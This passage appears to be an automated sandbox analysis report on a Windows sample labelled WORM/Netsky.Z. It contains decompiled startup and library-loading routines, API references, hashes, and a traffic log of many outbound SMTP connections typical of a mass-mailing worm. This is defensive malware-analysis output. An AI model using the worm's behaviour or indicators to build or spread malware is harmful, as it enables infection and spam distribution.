						__eflags = _t60 & 0x00000008;
						if((_t60 & 0x00000008) != 0) {
							L23:
							_t62 = _t70 & 0x0000001f;
							__eflags = _t62;
							_t52 = 0x5c9dc0[_t70 >> 5] + _t62 * 8;
							 *_t52 =  *_t58;
							_t52[1] =  *_t75;
							goto L24;
						}
						_t53 = GetFileType(_t48);
						__eflags = _t53;
						if(_t53 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_t70 = _t70 + 1;
						_t75 = _t75 + 1;
						_t58 =  &(_t58[1]);
						__eflags = _t70 - _t74;
					} while (_t70 < _t74);
					goto L25;
				} else {
					_t71 = 0x5c9dc4;
					while(1) {
						_t54 = E00403F9E(0x100);
						__eflags = _t54;
						if(_t54 == 0) {
							break;
						}
						 *0x5c9ec0 =  *0x5c9ec0 + 0x20;
						__eflags =  *0x5c9ec0;
						 *_t71 = _t54;
						_t10 = _t54 + 0x100; // 0x100
						_t66 = _t10;
						while(1) {
							__eflags = _t54 - _t66;
							if(_t54 >= _t66) {
								break;
							}
							 *(_t54 + 4) =  *(_t54 + 4) & 0x00000000;
							 *_t54 =  *_t54 | 0xffffffff;
							 *((char*)(_t54 + 5)) = 0xa;
							_t54 = _t54 + 8;
							_t66 =  *_t71 + 0x100;
						}
						_t71 =  &(_t71[1]);
						__eflags =  *0x5c9ec0 - _t74; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t74 =  *0x5c9ec0; // 0x20
					goto L18;
				}
			}

0x004047dd
0x004047e2
0x004047e6
0x004047eb
0x004047ec
0x004047f2
0x004047fc
0x004047fc
0x00404802
0x00404806
0x0040480a
0x0040480d
0x00404811
0x00404816
0x00404819
0x00404819
0x00404825
0x0040482b
0x00404831
0x004048fc
0x004048fc
0x004048fc
0x004048fe
0x004048fe
0x00404903
0x00404907
0x0040490a
0x00404959
0x00404959
0x00404959
0x00000000
0x00404959
0x0040490c
0x0040490e
0x00404912
0x0040491e
0x00404920
0x00404920
0x00404914
0x00404916
0x00404916
0x0040492a
0x0040492c
0x0040492f
0x00404948
0x00404948
0x00404931
0x00404932
0x00404938
0x0040493a
0x00000000
0x00000000
0x0040493c
0x00404941
0x00404943
0x00404946
0x0040494e
0x00404951
0x00404953
0x00404953
0x00000000
0x00404951
0x00000000
0x00404946
0x0040495d
0x0040495d
0x0040495e
0x0040495e
0x00404976
0x00404976
0x00404837
0x0040483b
0x0040483d
0x00000000
0x00000000
0x00404843
0x00404845
0x0040484d
0x0040484f
0x00404852
0x00404854
0x00404854
0x00404856
0x0040485c
0x004048b0
0x004048b0
0x004048b2
0x004048b4
0x00000000
0x00000000
0x00000000
0x00000000
0x004048b6
0x004048b6
0x004048b6
0x004048b8
0x004048bb
0x00000000
0x00000000
0x004048bd
0x004048c0
0x004048c3
0x00000000
0x00000000
0x004048c5
0x004048c8
0x004048d5
0x004048dc
0x004048dc
0x004048e6
0x004048eb
0x004048f0
0x00000000
0x004048f0
0x004048cb
0x004048d1
0x004048d3
0x00000000
0x00000000
0x00000000
0x004048f3
0x004048f3
0x004048f4
0x004048f5
0x004048f8
0x004048f8
0x00000000
0x0040485e
0x0040485e
0x00404863
0x00404868
0x0040486d
0x00404870
0x00000000
0x00000000
0x00404872
0x00404872
0x00404879
0x0040487b
0x0040487b
0x00404881
0x00404881
0x00404883
0x00000000
0x00000000
0x00404885
0x00404889
0x0040488c
0x00404892
0x00404895
0x00404895
0x0040489d
0x004048a0
0x004048a6
0x00000000
0x00000000
0x00000000
0x004048a8
0x004048aa
0x00000000
0x004048aa

APIs

GetStartupInfoA.KERNEL32(?), ref: 00404825
GetFileType.KERNEL32(00000800), ref: 004048CB
GetStdHandle.KERNEL32(-000000F6), ref: 00404924
GetFileType.KERNEL32(00000000), ref: 00404932
SetHandleCount.KERNEL32 ref: 00404969

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 1375a6c9c3f61a4d19b1f2d17453f35d8f3a7799d43444a83576ce86be360e59
Instruction ID: a73ec98d43f32128b85036683f89d50c7ad120f9e311400b7baf05c4fcc4ecc2
Opcode Fuzzy Hash: 1375a6c9c3f61a4d19b1f2d17453f35d8f3a7799d43444a83576ce86be360e59
Instruction Fuzzy Hash: 4A516BB69043818FD720AB28CC48B133B94FBA1325F158B3AD6A6E73E0D7789804D759

Uniqueness

Uniqueness Score: -1.00%

Function 0040593E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 00405952

Strings

, xrefs: 00405977
, xrefs: 0040599B

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 0f063676c16cb85e7ddddc100148c60e987aa9dc4b1b2c31293c9c86de59953c
Instruction ID: f0215aa1347f79237905c16c147d2b30474e102b4b66deccb5b253802382f449
Opcode Fuzzy Hash: 0f063676c16cb85e7ddddc100148c60e987aa9dc4b1b2c31293c9c86de59953c
Instruction Fuzzy Hash: 7A4148301046586EEB118764DD9DFEB3F98DB06704F1801F6D185EB192C2394E48EFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040606D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040608D
WideCharToMultiByte.KERNEL32(00000000,00000220,?,00000000,00000000,00000100,00000000,00000000,?,00000000,?,00000100,00000000,00000100,00000000,00000001), ref: 004060B2

Strings

@hhvPIhv0Ihv, xrefs: 004060B2

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID: @hhvPIhv0Ihv
API String ID: 2829165498-1837815877
Opcode ID: 7c3192f705e7cf72b5abb8fc895f530fea83c5259392d8b2d3183361c2b248d1
Instruction ID: c50ee14702cf725d331e055932e9fdf1f029573b298cec15211dbfa148304b56
Opcode Fuzzy Hash: 7c3192f705e7cf72b5abb8fc895f530fea83c5259392d8b2d3183361c2b248d1
Instruction Fuzzy Hash: 52F08132940164AFCF268F95DC4499FBB79EB887A1F154136F91272290D2355C21DBA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Jammer2nd.exePID: 4740, Parent PID: 3324COMMON

Executed Functions

Function 006B014F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 115memorywindowCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1000128F,00001000,00000040,006B02BE,?,?,?,?,0000001C,0000001C), ref: 006B01D3
wsprintfA.USER32 ref: 006B0242
wsprintfA.USER32 ref: 006B0261
MessageBoxA.USER32(00000000,006B085B,Entry Point Not Found,00000010), ref: 006B0279
ExitProcess.KERNEL32(00000001,?,?,?,?,0000001C,0000001C), ref: 006B0281
VirtualFree.KERNELBASE(00760000,00000000,00008000,SQRWVU,SQRWVU,SQRWVU,?,?,?,?,0000001C,0000001C), ref: 006B029C

Strings

The ordinal %d could not be located in the dynamic link library %s., xrefs: 006B023A
[any], xrefs: 006B0252
The procedure entry point %s could not be located in the dynamic link library %s., xrefs: 006B0259
SQRWVU, xrefs: 006B01DB, 006B01E1, 006B01E7, 006B01ED, 006B0202
Entry Point Not Found, xrefs: 006B026F

Memory Dump Source

Source File: 00000001.00000003.326968214.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_6b0000_Jammer2nd.jbxd

Similarity

API ID: Virtualwsprintf$AllocExitFreeMessageProcess
String ID: Entry Point Not Found$SQRWVU$The ordinal %d could not be located in the dynamic link library %s.$The procedure entry point %s could not be located in the dynamic link library %s.$[any]
API String ID: 81942880-1410871612
Opcode ID: ff9455d2897b091cda98db5d8d6b0dcf280fd5aac371be2e3536bd5b1e227d4c
Instruction ID: f1e1ce9e16c39492300e41fe5797210f0c4d01ed7e869216ecfef642fc529a98
Opcode Fuzzy Hash: ff9455d2897b091cda98db5d8d6b0dcf280fd5aac371be2e3536bd5b1e227d4c
Instruction Fuzzy Hash: DC416CB62007459FEB38DF58CC45AEB77AAAF48340F04411DEE4AD3758DB30AA64CB54

Uniqueness

Uniqueness Score: -1.00%

Function 006B03F5 Relevance: 3.0, APIs: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 006B0404
GetProcAddress.KERNEL32(?,00000000), ref: 006B042A

Memory Dump Source

Source File: 00000001.00000003.326968214.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_6b0000_Jammer2nd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: f41758034674d93726ecefea48cfd71218187c667b4d8fae7afe95e189cf004c
Instruction ID: f99829331527e49fb59220419ee85c4b9b9de614050a112b0cb8cb5e81756c8c
Opcode Fuzzy Hash: f41758034674d93726ecefea48cfd71218187c667b4d8fae7afe95e189cf004c
Instruction Fuzzy Hash: 3BF08CB2700205DBFB10CF2DD9806EABBE6EF942A43284539DA1AD7344DA31ED608710

Uniqueness

Uniqueness Score: -1.00%

Function 006B07A5 Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?), ref: 006B07C6

Memory Dump Source

Source File: 00000001.00000003.326968214.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_6b0000_Jammer2nd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9ad165436d458145d1bfba04ae4137792d26044e975007e1cc314144093ac068
Instruction ID: b0f9f7b695a129cf9945e0c9f271180c1855ef87e501d1bf8d140f35dd1fb0f8
Opcode Fuzzy Hash: 9ad165436d458145d1bfba04ae4137792d26044e975007e1cc314144093ac068
Instruction Fuzzy Hash: 32F01276B012159B9F11DE3895405DF7B62EF943A07258276EC18DB348DF30ED519B90

Uniqueness

Uniqueness Score: -1.00%

Source: 0.2. .exe.400000.0.unpack	Avira: Label: TR/Crypt.CFI.Gen
Source: 0.0. .exe.400000.0.unpack	Avira: Label: WORM/Netsky.Z
Source: 1.2.Jammer2nd.exe.400000.0.unpack	Avira: Label: TR/Crypt.CFI.Gen
Source: 1.0.Jammer2nd.exe.400000.0.unpack	Avira: Label: WORM/Netsky.Z

Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061340710069592X-DeviceID: 0100748C0900F045X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Agent-DeviceId: 0100748C0900F045X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAATGOjhyCBrEl1Awji/g7SRpxfRm6uWBRuknppntx4OiUWhXYc4%2B3VQnWDF1be33N1ghsq3j4YMAI/YDUY38tMDQIa0safxbjvckEvW4tNqBM1O4tKr8hfvcKDOdVm5hOMuYmheSrgvEMOdpMN3JcqX5ZBSUZe4n9Mmx6YOtZo48C5mjJh%2Bzx42WFFIOLDIsKQmst1kJcfpJufkc0ZX4mGVgSQ3X%2BJNyj779EzrVHCPzqC9eEVVLpIgcQYH8VU5MPtC58KC2FM2gsmwePhmSBv5sAa35vDVSISQeT7PeFAb6eSz6jRU44rclCl9/zWgC2fmbvB5IeckE0QQ6uFneWYVsDZgAACNQSEqqyOT5iqAH5MRxWMYLqTyO2njozjedhAQ7YM0I82pzzoXTQ6tg332TSA2bDgR6Njn%2BNsmaq46AFimVMA5PShcvlHPpo7GqVeEWUtUledDOHejewOg/eCCo62oigQWy6B5/%2BH5Ce8OaZ1S6C/io7kvSaiD5Ggnb5dJowaWVfqx5x8e1c1YLcq5ezMB5IHUKhZINnTjvxvvUH%2BApHhRlENBwpIz5nN3v0OvdBVXAyrr2lQ9wYKsxTBreDU52epgCfgBSzvic6nyceUMT2G8cKJ5ad1FGZ0AGzleGhsX45QvQVBQRKiJ30E1rd22y7nZSTEXt%2BPT2h9dFP1MWr2kPCdqhXX5DGqUsvUXfxYG4qE93TMRMWuyg4MFCpWOYN5YxP85QjHsTwM9g6pblWpt4UQvxcD9d6sohVPA1Ammt8L5wtebIFFZptYU41hWJqpCZVQSwkefgUS2PpUd9EGRiPJbh1K2bkIv/0erBIrXPhhiVeyO%2BjCWNR0ltJADhqhNpuC32hi2A8k3%2BHrhg7cXM1Yx11gfh7OnF37PsvK6keCy0L94WbIS2ZOUSG33rPdEQv1gE%3D%26p%3DX-BM-CBT: 1660688483X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: A093DD4137F64C659186F72CE611649CX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: /Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 86635Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=0BA1234E3B2140EBA8746E9F98F8CAA3; _SS=CPID=1660688519156&AC=1&CPH=4ef661f2&HV=1660688519
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061340710069592X-DeviceID: 0100748C0900F045X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Agent-DeviceId: 0100748C0900F045X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAATGOjhyCBrEl1Awji/g7SRpxfRm6uWBRuknppntx4OiUWhXYc4%2B3VQnWDF1be33N1ghsq3j4YMAI/YDUY38tMDQIa0safxbjvckEvW4tNqBM1O4tKr8hfvcKDOdVm5hOMuYmheSrgvEMOdpMN3JcqX5ZBSUZe4n9Mmx6YOtZo48C5mjJh%2Bzx42WFFIOLDIsKQmst1kJcfpJufkc0ZX4mGVgSQ3X%2BJNyj779EzrVHCPzqC9eEVVLpIgcQYH8VU5MPtC58KC2FM2gsmwePhmSBv5sAa35vDVSISQeT7PeFAb6eSz6jRU44rclCl9/zWgC2fmbvB5IeckE0QQ6uFneWYVsDZgAACNQSEqqyOT5iqAH5MRxWMYLqTyO2njozjedhAQ7YM0I82pzzoXTQ6tg332TSA2bDgR6Njn%2BNsmaq46AFimVMA5PShcvlHPpo7GqVeEWUtUledDOHejewOg/eCCo62oigQWy6B5/%2BH5Ce8OaZ1S6C/io7kvSaiD5Ggnb5dJowaWVfqx5x8e1c1YLcq5ezMB5IHUKhZINnTjvxvvUH%2BApHhRlENBwpIz5nN3v0OvdBVXAyrr2lQ9wYKsxTBreDU52epgCfgBSzvic6nyceUMT2G8cKJ5ad1FGZ0AGzleGhsX45QvQVBQRKiJ30E1rd22y7nZSTEXt%2BPT2h9dFP1MWr2kPCdqhXX5DGqUsvUXfxYG4qE93TMRMWuyg4MFCpWOYN5YxP85QjHsTwM9g6pblWpt4UQvxcD9d6sohVPA1Ammt8L5wtebIFFZptYU41hWJqpCZVQSwkefgUS2PpUd9EGRiPJbh1K2bkIv/0erBIrXPhhiVeyO%2BjCWNR0ltJADhqhNpuC32hi2A8k3%2BHrhg7cXM1Yx11gfh7OnF37PsvK6keCy0L94WbIS2ZOUSG33rPdEQv1gE%3D%26p%3DX-BM-CBT: 1660688483X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: A093DD4137F64C659186F72CE611649CX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: /Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 89942Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=0BA1234E3B2140EBA8746E9F98F8CAA3; _SS=CPID=1660688519156&AC=1&CPH=4ef661f2&HV=1660688519

Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 98.136.96.91:25
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 85.187.148.2:25
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 104.47.66.10:25
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 142.250.27.26:25
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 209.51.188.92:25
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 142.250.102.26:25
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 142.250.27.27:25
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 198.252.153.129:25
Source: global traffic	TCP traffic: 192.168.2.5:49713 -> 94.100.180.31:25
Source: global traffic	TCP traffic: 192.168.2.5:49717 -> 80.75.42.227:25
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 91.136.8.41:25
Source: global traffic	TCP traffic: 192.168.2.5:49721 -> 104.47.0.36:25
Source: global traffic	TCP traffic: 192.168.2.5:49722 -> 104.47.22.161:25
Source: global traffic	TCP traffic: 192.168.2.5:49723 -> 104.47.56.161:25
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 67.195.228.86:25
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 44.238.161.41:25
Source: global traffic	TCP traffic: 192.168.2.5:49730 -> 185.253.212.68:25
Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 104.47.57.110:25
Source: global traffic	TCP traffic: 192.168.2.5:49737 -> 131.107.88.24:25
Source: global traffic	TCP traffic: 192.168.2.5:49745 -> 165.227.159.144:25
Source: global traffic	TCP traffic: 192.168.2.5:49749 -> 131.107.55.31:25
Source: global traffic	TCP traffic: 192.168.2.5:49752 -> 96.47.154.206:25
Source: global traffic	TCP traffic: 192.168.2.5:49761 -> 195.29.173.138:25
Source: global traffic	TCP traffic: 192.168.2.5:49763 -> 178.218.165.214:25
Source: global traffic	TCP traffic: 192.168.2.5:49767 -> 212.19.106.223:25
Source: global traffic	TCP traffic: 192.168.2.5:49768 -> 40.93.212.0:25
Source: global traffic	TCP traffic: 192.168.2.5:49770 -> 159.253.31.95:25
Source: global traffic	TCP traffic: 192.168.2.5:49773 -> 104.47.73.10:25
Source: global traffic	TCP traffic: 192.168.2.5:49780 -> 104.47.11.202:25
Source: global traffic	TCP traffic: 192.168.2.5:49782 -> 64.147.108.52:25
Source: global traffic	TCP traffic: 192.168.2.5:49784 -> 51.81.61.70:25
Source: global traffic	TCP traffic: 192.168.2.5:49785 -> 185.132.181.97:25
Source: global traffic	TCP traffic: 192.168.2.5:49786 -> 131.111.8.146:25
Source: global traffic	TCP traffic: 192.168.2.5:49787 -> 64.29.151.236:25
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 208.91.199.225:587
Source: global traffic	TCP traffic: 192.168.2.5:49789 -> 148.163.139.28:25
Source: global traffic	TCP traffic: 192.168.2.5:49790 -> 140.78.3.83:25
Source: global traffic	TCP traffic: 192.168.2.5:49791 -> 153.127.71.68:25

Source: .exe, 00000000.00000003.433139930.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ms-experience.gigsky.com
Source: .exe, 00000000.00000003.525896094.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.525307808.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.524894550.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.m
Source: .exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.490395425.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://scottmuc.com/blog/development/pester-bdd-for-the-system-administrator/)
Source: .exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://scottmuc.com/blog/development/powershell-bdd-testing-pester-screencast/)
Source: .exe, 00000000.00000003.474480239.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.adobe.
Source: .exe, 00000000.00000003.480690386.00000000008E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/license-2.0
Source: .exe, 00000000.00000003.474480239.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.domini.cat/~anna_maria/
Source: .exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.powershellmagazine.com/2014/03/12/get-started-with-pester-powershell-unit-testing-framewo
Source: .exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.powershellmagazine.com/2014/03/27/testing-your-powershell-scripts-with-pester-assertions-
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live-int.com/inlinesignup.aspx?iww=1&id=80603
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live-int.com/inlinesignup.aspx?iww=1&id=80604
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live-int.com/inlinesignup.aspx?iww=1&id=80605
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live-int.com/msangcwam
Source: .exe, 00000000.00000003.434976951.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.microsoft-int.com/?ref=settings
Source: .exe, 00000000.00000003.546168419.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.cX
Source: .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.351716534.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527414235.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409113422.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000002.564291107.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527841033.0000000000890000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527841033.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527618971.000000000087A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/mergesession
Source: .exe, 00000000.00000003.487995373.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://build.powershell.org/guestauth/app/rest/builds/buildtype:(id:pester_testpester)/statusicon)
Source: .exe, 00000000.00000003.487995373.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://build.powershell.org/project.html?projectid=pester&tab=projectoverview&guest=1)
Source: .exe, 00000000.00000003.403054458.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-es6-module-like-alternative-to-goog.p
Source: .exe, 00000000.00000003.488463923.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.488884050.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mitchellh/vagrant/blob/master/changelog.md)
Source: .exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pester/pester/wiki)
Source: .exe, 00000000.00000003.487995373.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pester/pester/wiki/what
